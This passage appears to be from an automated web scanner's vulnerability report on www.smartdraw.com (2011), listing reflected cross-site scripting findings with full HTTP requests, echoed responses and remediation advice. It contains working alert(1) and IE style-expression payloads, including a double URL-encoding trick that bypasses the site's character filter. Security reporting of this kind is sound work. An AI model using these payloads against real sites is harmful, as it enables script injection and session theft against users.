Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/reviews6bd2b%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522f1b2d917b08 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:36 GMT
Content-Length: 8788
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=sktfbrnh1dtwviaawiverx45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/reviews6bd2b"style="x:expression(alert(1))"f1b2d917b08/" rel="nofollow" target="_blank">
...[SNIP]...

1.157. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323 was submitted in the REST URL parameter 2. This input was echoed as 96803"><script>alert(1)</script>dfbbf862323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/96803%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edfbbf862323?id=349540/x22/x3eSmartDraw HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:51 GMT
Content-Length: 8900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:51 GMT; path=/
Set-Cookie: ASP.NET_SessionId=smkoxh55k01vvq55ighs2efj; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/96803"><script>alert(1)</script>dfbbf862323/?id=349540/x22/x3eSmartDraw&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidde
...[SNIP]...

1.158. http://www.smartdraw.com/product/reviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 was submitted in the REST URL parameter 2. This input was echoed as a75f4"style="x:expression(alert(1))"4417cefb817 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/a75f4%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25224417cefb817 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:39 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fv4eqq55u13gyheum3ewifj0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/a75f4"style="x:expression(alert(1))"4417cefb817/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.159. http://www.smartdraw.com/product/reviews [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b82"><script>alert(1)</script>2e1c8977753 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?id=74b82"><script>alert(1)</script>2e1c8977753 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:34 GMT
Content-Length: 11117
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:34 GMT; path=/
Set-Cookie: ASP.NET_SessionId=av1vox3nuhp5qj55p3ucfqnm; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?id=74b82"><script>alert(1)</script>2e1c8977753&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

1.160. http://www.smartdraw.com/product/reviews [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5812"><script>alert(1)</script>d208eaaaa24 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:33 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qrx2kj45eidrpsqxg4kwhg3p; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11278
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?id=349540/x22/x3eSmartDrawc5812"><script>alert(1)</script>d208eaaaa24" rel="nofollow" target="_blank">
...[SNIP]...

1.161. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2401f"><script>alert(1)</script>0614465aa10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?2401f"><script>alert(1)</script>0614465aa10=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:20 GMT
Content-Length: 11110
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4os3yc45lngvyibnt1hyfy45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/product/reviews/index.htm?2401f"><script>alert(1)</script>0614465aa10=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.162. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/reviews

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dadb8"><script>alert(1)</script>9e1a39efb8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/reviews?dadb8"><script>alert(1)</script>9e1a39efb8f=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:20 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pvqz3e55knqwjb55fkolzlq3; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11110
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/product/reviews/index.htm?dadb8"><script>alert(1)</script>9e1a39efb8f=1" rel="nofollow" target="_blank">
...[SNIP]...

1.163. http://www.smartdraw.com/product/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0 was submitted in the REST URL parameter 1. This input was echoed as a6214"style="x:expression(alert(1))"a8713ae88e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /a6214%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522a8713ae88e0/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:50 GMT; path=/
Set-Cookie: ASP.NET_SessionId=g5orivnknoeu3mnalqm5ky2h; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/a6214"style="x:expression(alert(1))"a8713ae88e0/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.164. http://www.smartdraw.com/product/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1 was submitted in the REST URL parameter 1. This input was echoed as c202c"style="x:expression(alert(1))"1983cde1eb1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /productc202c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221983cde1eb1/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:44 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:44 GMT; path=/
Set-Cookie: ASP.NET_SessionId=yytjsqjo2ynqqa55mlvyit45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/productc202c"style="x:expression(alert(1))"1983cde1eb1/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.165. http://www.smartdraw.com/product/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a was submitted in the REST URL parameter 2. This input was echoed as 9a64e"style="x:expression(alert(1))"79d9addfb9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/9a64e%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252279d9addfb9a HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:57 GMT; path=/
Set-Cookie: ASP.NET_SessionId=4ccossevexhpky454jv13azr; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8739
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/9a64e"style="x:expression(alert(1))"79d9addfb9a/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.166. http://www.smartdraw.com/product/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e was submitted in the REST URL parameter 2. This input was echoed as e7026"style="x:expression(alert(1))"d34dba31b1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /product/x22e7026%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d34dba31b1e HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:53 GMT
Content-Length: 8760
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:53 GMT; path=/
Set-Cookie: ASP.NET_SessionId=5ppvdnq4c02bbb55spc4py55; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22e7026"style="x:expression(alert(1))"d34dba31b1e/" rel="nofollow" target="_blank">
...[SNIP]...

1.167. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 146c3"style="x:expression(alert(1))"5d5d2fc8c51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?146c3"style%3d"x%3aexpression(alert(1))"5d5d2fc8c51=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:36 GMT; path=/
Set-Cookie: ASP.NET_SessionId=uaszcl55vdwks2faid1tcq45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/product/x22/?146c3"style="x:expression(alert(1))"5d5d2fc8c51=1" rel="nofollow" target="_blank">
...[SNIP]...

1.168. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /product/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbd65"style="x:expression(alert(1))"a43b560b887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /product/x22?fbd65"style%3d"x%3aexpression(alert(1))"a43b560b887=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:38 GMT; path=/
Set-Cookie: ASP.NET_SessionId=k3dxer55b03zcg45gc2kh5b5; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
